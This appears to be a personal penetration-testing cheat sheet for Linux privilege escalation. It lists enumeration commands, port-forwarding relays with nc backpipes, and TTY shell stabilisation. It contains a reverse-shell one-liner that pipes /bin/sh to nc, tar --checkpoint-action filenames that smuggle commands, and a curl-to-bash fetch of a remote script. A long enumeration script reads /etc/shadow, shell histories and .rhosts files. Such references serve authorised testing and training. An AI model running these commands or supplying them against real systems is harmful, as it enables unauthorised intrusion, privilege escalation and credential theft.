f1ow2

Appearance

SRC tips

Useful Linux command

SUID 提权枚举 (Suid)

bash
find / -user root -perm /4000 2>/dev/null
bash
find / -perm -u=s -type f 2>/dev/null
bash
find / -type f -name '*.txt' 2>/dev/null
bash
find / -user root -perm -4000 -exec ls -ldb {} \; > /tmp/suid
bash
getcap -r / 2>/dev/null

系统发行版信息 (VersionSystem)

bash
cat /etc/issue
bash
cat /etc/*-release
bash
cat /etc/lsb-release
bash
cat /etc/redhat-release

内核版本信息 (KernelVersion)

bash
cat /proc/version
bash
uname -a
bash
uname -mrs
bash
rpm -q kernel
bash
dmesg | grep Linux
bash
ls /boot | grep vmlinuz

环境变量 (EnvironmentVariables)

bash
cat /etc/profile
bash
cat /etc/bashrc
bash
cat ~/.bash_profile
bash
cat ~/.bashrc
bash
cat ~/.bash_logout
bash
env
bash
set

服务配置文件 (ServiceSettings)

bash
cat /etc/syslog.conf
bash
cat /etc/chttp.conf
bash
cat /etc/lighttpd.conf
bash
cat /etc/cups/cupsd.conf
bash
cat /etc/inetd.conf
bash
cat /etc/apache2/apache2.conf
bash
cat /etc/my.conf
bash
cat /etc/httpd/conf/httpd.conf
bash
cat /opt/lampp/etc/httpd.conf
bash
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

定时任务 (Cron Jobs)

bash
crontab -l
bash
ls -alh /var/spool/cron
bash
ls -al /etc/ | grep cron
bash
ls -al /etc/cron*
bash
cat /etc/cron*
bash
cat /etc/at.allow
bash
cat /etc/at.deny
bash
cat /etc/cron.allow
bash
cat /etc/cron.deny
bash
cat /etc/crontab
bash
cat /etc/anacrontab
bash
cat /var/spool/cron/crontabs/root

网络与主机状态 (UsersHost)

bash
lsof -i
bash
lsof -i :80
bash
grep 80 /etc/services
bash
netstat -antup
bash
netstat -antpx
bash
netstat -tulpn
bash
chkconfig --list
bash
chkconfig --list | grep 3:on
bash
last
bash
lastlog

端口转发与隧道 (PortForwarding)

bash
FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
bash
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
bash
ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
bash
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port
bash
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
bash
mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
bash
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay
bash
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)
bash
backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc
bash
localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)

通配符提权 (Wildcard Privesc)

bash
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > shell.sh
bash
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
bash
touch "/var/www/html/--checkpoint=1"

TTY Spawn Shell

Often during pentests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.

All the steps to stabilize your shell

The first step:

bash
python3 -c 'import pty;pty.spawn("/bin/bash")'

Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys.

Step two is:

bash
export TERM=xterm

This will give us access to term commands such as clear.

Finally (and most importantly) we will background the shell using

bash
Ctrl + Z

Back in our own terminal we use

bash
stty raw -echo; fg

This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes

Script to check every misconfigurations

misconfiguration.sh
sh

#!/bin/bash

# curl -s https://gist.githubusercontent.com/LasCC/6f3838dc02f46b14e9dbc9bc0972407e/raw/a0d9e015ee942aa5b124c4bcdbe487b40ac6ac4e/misconfiguration.sh | bash

# Kernel and distribution release details
echo -e "\033[1;31m[+] Kernel and distribution release details\033[0m"
uname -a
cat /etc/*-release
echo

# System Information
echo -e "\033[1;31m[+] System Information\033[0m"

# Hostname
echo -e "\033[1;32m[+] Hostname\033[0m"
hostname
echo

# Networking details
echo -e "\033[1;32m[+] Networking details\033[0m"

# Current IP
echo -e "\033[1;32m[+] Current IP\033[0m"
ip a | grep 'inet'
echo

# Default route details
echo -e "\033[1;32m[+] Default route details\033[0m"
route -n
echo

# DNS server information
echo -e "\033[1;32m[+] DNS server information\033[0m"
cat /etc/resolv.conf
echo

# User Information
echo -e "\033[1;31m[+] User Information\033[0m"

# Current user details
echo -e "\033[1;32m[+] Current user details\033[0m"
whoami
echo

# Last logged on users
echo -e "\033[1;32m[+] Last logged on users\033[0m"
last
echo

# Shows users logged onto the host
echo -e "\033[1;32m[+] Shows users logged onto the host\033[0m"
who
echo

# List all users including uid/gid information
echo -e "\033[1;32m[+] List all users including uid/gid information\033[0m"
cat /etc/passwd
echo

# List root accounts
echo -e "\033[1;32m[+] List root accounts\033[0m"
grep "x:0:" /etc/passwd
echo

# Extracts password policies and hash storage method information
echo -e "\033[1;32m[+] Extracts password policies and hash storage method information\033[0m"
grep "^password" /etc/pam.d/*
echo

# Checks umask value
echo -e "\033[1;32m[+] Checks umask value\033[0m"
umask
echo

# Attempt to read restricted files i.e. /etc/shadow
echo -e "\033[1;31m[+] Attempt to read restricted files i.e. /etc/shadow\033[0m"
cat /etc/shadow 2>/dev/null
echo

# List current users history files (i.e .bash_history, .nano_history etc.)
echo -e "\033[1;31m[+] List current users history files\033[0m"
find /home -name ".bash_history" -o -name ".nano_history" -exec ls -la {} \;
echo

# Which users have recently used sudo
echo -e "\033[1;31m[+] Which users have recently used sudo\033[0m"
grep "sudo" /var/log/auth.log
echo

# Determine if /etc/sudoers is accessible
echo -e "\033[1;31m[+] Determine if /etc/sudoers is accessible\033[0m"
ls -la /etc/sudoers
echo

# Are known ‘good’ breakout binaries available via Sudo (i.e. nmap, vim etc.)
echo -e "\033[1;31m[+] Are known ‘good’ breakout binaries available via Sudo\033[0m"
sudo -l | grep "nmap\|vim"
echo

# Is root’s home directory accessible
echo -e "\033[1;31m[+] Is root’s home directory accessible\033[0m"
ls -ld /root
echo

# List permissions for /home/
echo -e "\033[1;31m[+] List permissions for /home/\033[0m"
ls -ld /home
echo

# Display current $PATH
echo -e "\033[1;31m[+] Display current \$PATH\033[0m"
echo $PATH
echo

echo -e "\033[1;31m[+] List all cron jobs\033[0m"
crontab -l
echo

echo -e "\033[1;31m[+] Locate all world-writable cron jobs\033[0m"
find /etc/cron* -perm -0002 -type f -exec ls -la {} \;
echo

echo -e "\033[1;31m[+] Locate cron jobs owned by other users of the system\033[0m"
find /etc/cron* ! -user root -type f -exec ls -la {} \;
echo

echo -e "\033[1;31m[+] List the active and inactive systemd timers\033[0m"
systemctl list-timers --all
echo

echo -e "\033[1;31m[+] List running processes\033[0m"
ps aux
echo

echo -e "\033[1;31m[+] Lookup and list process binaries and associated permissions\033[0m"
ps aux --sort=-%cpu | awk '{print $11}' | xargs -r ls -la 2>/dev/null
echo

echo -e "\033[1;31m[+] List init.d binary permissions\033[0m"
ls -la /etc/init.d/*
echo

echo -e "\033[1;31m[+] Locate all SUID/GUID files\033[0m"
find / -perm /4000 -type f 2>/dev/null
echo

echo -e "\033[1;31m[+] Locate all world-writable SUID/GUID files\033[0m"
find / -perm /6000 -type f 2>/dev/null
echo

echo -e "\033[1;31m[+] Locate all SUID/GUID files owned by root\033[0m"
find / -user root -perm /4000 -type f 2>/dev/null
echo

echo -e "\033[1;31m[+] Locate ‘interesting’ SUID/GUID files (i.e. nmap, vim etc)\033[0m"
find / -user root -perm /4000 -type f -name "nmap" -o -name "vim" 2>/dev/null
echo

echo -e "\033[1;31m[+] Locate files with POSIX capabilities\033[0m"
getcap -r / 2>/dev/null
echo

echo -e "\033[1;31m[+] List all world-writable files\033[0m"
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
echo

echo -e "\033[1;31m[+] Find/list all accessible *.plan files and display contents\033[0m"
find / -name "*.plan" -exec cat {} \; 2>/dev/null
echo

echo -e "\033[1;31m[+] Find/list all accessible *.rhosts files and display contents\033[0m"
find / -name "*.rhosts" -exec cat {} \; 2>/dev/null
echo

echo -e "\033[1;31m[+] Show NFS server details\033[0m"
showmount -e
echo

echo -e "\033[1;31m[+] Locate *.conf and *.log files containing keyword supplied at script runtime\033[0m"
grep -r "keyword" /etc/*.conf /var/log/* 2>/dev/null
echo

echo -e "\033[1;31m[+] List all *.conf files located in /etc\033[0m"
ls -la /etc/*.conf
echo

echo -e "\033[1;31m[+] .bak file search\033[0m"
find / -name "*.bak" -exec ls -la {} \; 2>/dev/null
echo

echo -e "\033[1;31m[+] Locate mail\033[0m"
find / -name "mail" -exec ls -la {} \; 2>/dev/null
echo

echo -e "\033[1;31m[+] Checks to determine if we're in a Docker container\033[0m"
cat /proc/self/cgroup | grep "docker"
echo

echo -e "\033[1;31m[+] Checks to see if the host has Docker installed\033[0m"
which docker
echo

echo -e "\033[1;31m[+] Checks to determine if we're in an LXC container\033[0m"
cat /proc/self/cgroup | grep "lxc"
echo

Last updated:

Released under the MIT License.

Copyright © 2025-present f1ow2